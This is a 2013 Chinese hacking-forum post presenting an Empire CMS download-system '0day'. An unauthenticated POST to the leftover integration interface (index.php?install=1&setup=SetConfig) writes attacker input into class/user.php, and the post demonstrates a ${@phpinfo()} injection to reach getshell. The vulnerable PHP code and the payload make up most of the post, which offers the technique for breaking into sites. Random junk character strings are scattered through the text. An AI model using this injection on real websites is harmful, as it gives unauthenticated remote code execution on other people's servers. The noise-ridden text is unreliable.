找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2406|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们: w+ _7 C3 _6 ]) Z1 e+ {) c
( L- }* X, M. j5 N4 @


0 v! e( y6 _3 g7 R0 h5 ]) ]' J这是帝国的一套下载系统 如图
  V  Z, J0 e  O. u3 z; nps(不需要任何账户和密码,直接写shell)


0 r5 D' D* G+ q, D) D% B

由于很多站是由于下载要整合discuz 等等一些论坛....8 x' X+ n5 O# Y


2 B6 @  D7 m' \3 G5 Y, T" ~. k

而帝国他又有一个万能接口,如图

0 ]3 Q; {, j8 m8 V

/ W5 f' Z' W4 d9 V; h7 n* W9 N* P, U

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码- h+ T7 h' b1 C( a9 T& z

8 A/ n$ v* S3 e8 A, l( m当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
0 E! g1 [) s8 e. r$ l
/ y8 r1 ?% ?2 \. L' u! L1 }在data/fun.php中的15行
$ T3 P+ L1 {% q9 [( d6 `- W0 D* m9 T4 r' p( Y. Y
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
9 F8 l* O. P4 Y# t2 }% k. A% X
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干, q2 Z1 L/ p- {  n  i" G& U" k
9 P# N! o9 C7 p
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);  E9 G6 b. W* N: I" o9 @  U. q1 U
# b; Q) \- k* k' p( G5 ^( E! R
他将传进来的变量进行了切割,然后赋给了$filetext
  @' ]' a" `( E7 x: @4 e3 y
" Q) N% G" r+ o然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了1 d- y/ A& w" n* C1 o' F

% _7 \& X/ O2 ^5 i. \  ^4 k我们看看写入的结果,随便填一个


3 A5 J* z' a% F0 \) j: ^. M; z( R, b0 V# T- o; o
+ q, i) D0 h. k2 q, T

4 }# E7 ?" i7 F4 W9 }( _# P& X7 m) m8 Q) @& J. _; \3 P
0 Q+ |/ Y4 ~: d7 x$ u2 X% m1 d; D* W

7 U/ J. t3 L7 W) X- Y, k9 k7 I

2 m( Z  S+ f0 T

  {* r) b. t* r0 ^7 \5 G  Y
8 r1 o' X) p7 `6 x1 j

2 Q+ u' I% P# K
8 g  g7 ?/ H+ H3 q' F
+ }4 L4 d& l3 l. k
; {; B1 R- J& A) M: Q

0 f+ |7 W! e8 }& y! _. @& T
7 ]& |8 @9 d* _0 P6 B
5 W- J! D# K8 i1 F- D% d& L7 J' ~
2 G# m, ^/ D" W+ D
7 L. |7 a3 D& W9 |8 ^% u7 N

( \- L8 w) V9 M& K5 C1 [$ U1 G& M" X. G  e1 `6 Q' W

所以我们淫荡点,写个${@phpinfo()}试试


/ z' u. ~. G/ a* D: D

然后访问以下class/user.php这个文件
6 ?' [( {4 L' K3 k& Z) b5 R日了吧


1 K; r3 _+ o1 y5 v( t, _
( s0 w0 K5 V* y

! A4 n0 r( K# p" p6 r9 z; u
8 ^3 Z! n7 ], R' t# s
+ N2 o. _; i# X% d" Z/ o
9 u: Z5 P, |! N' S

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表